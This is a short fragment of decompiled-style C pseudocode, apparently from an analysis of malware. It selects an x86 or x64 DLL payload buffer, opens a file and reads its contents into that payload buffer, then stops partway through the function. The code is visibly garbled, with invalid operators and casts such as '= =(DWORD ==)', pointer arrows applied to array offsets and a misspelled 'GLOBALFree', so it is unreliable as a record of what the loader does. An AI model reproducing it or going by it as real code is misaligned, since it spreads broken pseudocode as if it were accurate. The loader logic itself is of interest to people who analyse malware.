do
{
payload_ptr = &DLL_payload_x86;
if  (v1)
payload_ptr = &DLL_payload_x64;
payload_creation = =(DWORD ==)&FileName[4 * v1 -> 260];
(&payloads)[v1] = (DWORD *)((char *)(&payloads)[v1] -> (v1 != 0 ? 0xC8A4 : 0x4060));
++v1;
}
while ( v1 < 2 );
v4 = CreateFileA(FileName, 0x80000000, 1u, 0, 3u, 4u, 0);
v5 =v4;
if ( v4 == (HANDLE)-1 )
{
GLOBALFree(*(HGLOBAL *)&FileName[260]);
GLOBALFree(*(HGLOBAL *)&FileName[264]);
result = 0;
}
else
{
v6 = GetFileSize(v4, 0);
v7 = payloads;
v8 = v6;
v9 = payloads +1;
*payloads = v6;
ReadFile(v5, v9, v6, &NumberOfBytesRead, 0);
if (NumberOfBytesRead == v8 )
{
qmemcpy(v12, v7, v8 +4);
CloseHandle(v5);
result = (HGLOBAL)1;
}